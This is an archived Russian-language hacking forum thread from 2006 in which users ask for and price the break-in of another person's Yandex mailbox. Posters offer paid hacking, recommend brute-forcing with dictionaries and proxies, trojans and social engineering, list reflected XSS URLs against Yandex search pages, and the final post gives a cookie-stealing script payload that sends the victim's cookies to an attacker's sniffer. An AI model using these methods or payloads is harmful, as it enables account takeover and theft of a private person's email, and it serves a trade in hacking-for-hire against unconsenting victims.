Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   E-Mail (https://forum.antichat.xyz/forumdisplay.php?f=14)
-   -   Взлом ящика... (https://forum.antichat.xyz/showthread.php?t=20789)

Koller 22.06.2006 16:31

Взлом ящика...
 
Здравствуйте.
Вопрос следующий - на сколько реально ли взломать почтовый ящик на яндексе именно на сегодняшний день?
И сколько может стоит данная услуга?

Pochka 22.06.2006 17:10

реально и надежно. Обойдется в 40 долларов. Если согласен, напиши тут

Koller 22.06.2006 17:33

И написал это человек с репутацией чайника )
Хотелось бы узнать цены и от других людей...
И опять-таки...на сколько возможно...нужна 100% гарантия взлома ящика...

genOK 22.06.2006 17:59

хех.. ну в зависимости от того, кто там сидит на этом мыле... если полный ламер.. то можно как от нефиг сломать его....

Koller 22.06.2006 18:02

Нет...не полный ламер, но во взломах мало что смыслит...если Вы имели в виду сложность пароля не думаю, что он сложный...
Какими например способами Вы бы попробывали взломать?

Pochka 22.06.2006 18:05

Я не беру предоплаты. Я даю тебе ящик, если деньги не переводишь - я ящик забираю, так что на репутацию не смотри

Koller 22.06.2006 18:11

40 зеленых я не готов оплатить....
А можете взломать с той целью, чтоб мне доказать, что Вы все-таки умеете ломать подобные ящики? )...мне просто-напросто очень и очень нужно...а денег нет...понимаю, что всякую работу оплачивают...про цены узнать решил за одно...вот...жду ответа..

nc.STRIEM 22.06.2006 20:38

Цитата:

Сообщение от Koller
А можете взломать с той целью, чтоб мне доказать, что Вы все-таки умеете ломать

даваа свое мыло! взломаем! докажем че умем)))
а потом за WMZ вернем... )))

nc.STRIEM 22.06.2006 20:43

Цитата:

Сообщение от Pochka
Я даю тебе ящик, если деньги не переводишь - я ящик забираю

Очень уж мне интересно как ты его собрался забирать если отдаш??

Sn@k3 22.06.2006 21:06

Koller знаешь что такое брут(brute force) так вот запусти её и найди приличный словарь, да брути. если не выйдет, то пробуй куки пи*дить, на видео ачате полно такого(насчёт cookie)

SanyaX 22.06.2006 21:22

По правде баксов 50 стоит почту взломать. но у всех цены разные. "0 будет номарльно.

Sn@k3 22.06.2006 21:26

Цитата:

Сообщение от SanyaX
По правде баксов 50 стоит почту взломать. но у всех цены разные. "0 будет номарльно.


хех ты прав. тем более чувак знает брут......дуаю у него пасс типа :54DFd$%$# хех. так что вперёд патцаны. да я думаю против снифа умеет "защащаться"

KUELLER 23.06.2006 03:20

моно протроянить=)))))
стукни в асю.мыло дашь=)))

Koller 23.06.2006 09:18

Вариант трояна не пройдет, так как владелец мыла давно его не посещает, и когда посетит уже, неизвестно...
В любом случае один человек уже заслал Пинча...

KUELLER 23.06.2006 09:39

так ты не токо на мыло..найди форум где он сидит аську и тп
где небудь да попадется

KoTeG 23.06.2006 11:04

Koller если его аську найдешь поговори с ним ,разведи его !

RiHARD 23.06.2006 15:51

чувак если и это не пройдёт,принимайся за "СИ"(социальную инженерию),ну кароче разведи его на пароль.или выясни максимум инфы о пароле,к примеру буквенный,циферный итп,очень полезная инфа при подборе словаря для брута.

Peter 23.06.2006 22:12

Цитата:

Сообщение от Sn@k3
Koller знаешь что такое брут(brute force) так вот запусти её и найди приличный словарь, да брути. если не выйдет, то пробуй куки пи*дить, на видео ачате полно такого(насчёт cookie)

Ну я ради интереса попытался брутить. Когда со своего ИП, то идет нормально, но как только хочу через прокси, понятно почему, то брут не пашет...Там есть разные типы SOCKS 5, 4, 4.1 как узнать какой вид прокси относится к какому соксу или это необязательно?

Ch3ck 24.06.2006 01:14

Цитата:

Сообщение от Koller
40 зеленых я не готов оплатить....
А можете взломать с той целью, чтоб мне доказать, что Вы все-таки умеете ломать подобные ящики? )...мне просто-напросто очень и очень нужно...а денег нет...понимаю, что всякую работу оплачивают...про цены узнать решил за одно...вот...жду ответа..

Мне вот это не очень нравиться... вообще туфта какая-то...вот ещё доказывать.... :o

Koller 24.06.2006 20:56

Теперь по порядку )
1) На счет "развода" по аси...у данного человека нет выхода в интернет в последнее время...потому не получится...
2) На счет СИ - наврядли пройдет...владелец не такой уж и лол )
3) А теперь на счет туфты - почему сразу туфта? Да, мне реально нужно, что взломали один почтовый ящик...да, у меня денег нет, для оплаты сей услуги...я не отрицаю....я бы и сам попробывал побрутить, дай бог знаю как это делается, так возможностей нет для этого...я в интернете не особо часто появляюсь, возможности долго сидеть в нем у меня нет, посему прошу у вас помощи...и все...все элементарно и просто ;)

petro 24.06.2006 22:17

одни разговоры...
один виртуал...
здесь вообще есть реальные профессионалы или ламеры все???
мне нужно получить текущий пароль от yandex email готов выложить не много - 10 долл. Конечно это не много, но все же деньги.

nc.STRIEM 25.06.2006 00:58

если ящик заброшеный, то шансы его взломать сводяться практически к нулю!!! т.к. если там стоит пароль случайно сгенирированый, в несколько регистров то брут такого ящика может занять не 1 год...

petro 25.06.2006 13:07

Ящиком пользуется какждый день.
Пользователь кое что соображает в безопасности.

Помогите , ящик очень нужен!!!

LoneWolf666 25.06.2006 15:30

Помогают только друзьям и тем кто помощь заслужил... С остальными только торгово-рыночные отношения.

KoTeG 25.06.2006 23:52

Слушайте хватит парня унижать он вам как будто 10 $ не предложил , я вот понимаю его денег не особо нету так как он не особо во всем этом понимает! ;)

m2infect 26.06.2006 11:10

Цитата:

Сообщение от LoneWolf666
Помогают только друзьям и тем кто помощь заслужил... С остальными только торгово-рыночные отношения.

Полностью поддерживаю.

Касательно торгово-рыночных отношений.
Торговаться как на базаре, и говорить что нету денег - помоему это не совсем этично. Нету денег - нету работы, справедливо и обратное. Почему именно так, а не как-нить иначе?, я думаю что не нужно объяснять. Работа есть работа, какой бы она не была. Почему человек должен тратить своё время на пользователя, чтоб удовлетворить его желание и прислать ему на почту пароль.

Нужно уважать труд других.

Я ни кого не хотел обидеть. И думаю что меня многие поддержат.

Dronga 26.06.2006 19:41

Я фигею, форум по уязвимостям веб-интерфейсов, а мы обсуждаем СИ и впаривание троя... Брут ещё хоть каким-то боком можно к теме приписать. Очень радует активность новоиспеченных мудераторов раздела, со всех бы снял модерство, оставил только Майора, реально знающий человек, просто тема видать под его взор ещё не попала, ему простительно.

Поехали дальше. Все забыли про XSS.

Yandex.RU - Internet Explorer
_http://www.yandex.ru/yandsearch?text=gLAnce_was_here&stype="><script>al ert('found_by_gLAnce')</script>
_http://images.yandex.ru/yandsearch?rpt="><script>alert('found_by_gLAnce')</script>&text=xaxa
_http://news.yandex.ru/yandsearch?rpt=nnews2&grhow=clutop&text=sasa&doSea rch="><script>alert('found')</script>


Неужели их так трудно найти??? Ребята, это паблик античата.

Далее идём на страничку http://antichat.ru/sniff/ и прикручиваем сниффер. Тестим на себе. Если всё ОК, то после этого начинаем бомбить человека письмами с этими линками и душещипательными просьбами кликнуть по ним. Если нет - в ПМ к модерам раздела за помощью, не надо создавать тем вида "Почему не приходят куки". Если метод прокатил - поздравляю.

Этот вариант, что называется, от безысходности.

Если есть голова и время, то смело могу сказать, что на яндексе есть активная XSS прямо в теле письма, ищите =) Тот кто ищет и верит... Это, конечно, вариант "Люкс" =) И это уже мой приват для античата =) + мультибраузерная.

Напоследок, могу также уверенно заявить, что на сегодня есть на античате люди, которые могут реально предоставить пароль от желаемого ящика, только цвет ника у этих людей точно не белый. Советую быть осторожным при выборе исполнителя и выбирать тех, кто уже себя зарекомендовал на античате. Опять-таки, не факт, что они это делают для кого попало.

Вроде исчерпывающе.

Zadoxlik 26.06.2006 22:41

Dronga, цвет ника это не показатель. Лучше работать через гаранта, но это в том случае если исполнитель не согласен дать ящик вперед. Если согласен, то тут вообще без вариантов.

m2infect 27.06.2006 10:48

to Dronga.
Ответ исчпыващий. Спасибо.

Это-то просто. Нашел кучу сайтов с такой же ошибкой. Но как ею пользоваться? Я понял что в алерт нужно вставлять ссылку на сниф
Таких ошибок я нашел много'><script>alert(document.
cookie)</script> тем более это можно на каждом заборе прочитать. Только как пользоваться - как "прикрутить" туда сниф, так я и не понял. Ссылку на сниф просто так не вставить.


Но все же большое спасибо.

.Slip 27.06.2006 11:07

Цитата:

Ссылку на сниф просто так не вставить.
Отчего же не вставить?
Вместо:
Цитата:

<script>alert(document.
cookie)</script>
Ставишь:
Цитата:

<script>img = new Image(); img.src = "твой сниффер?"+document.cookie;</script>
И всё. Сниффер можно на сайте античата зерегистрировать.


Время: 14:12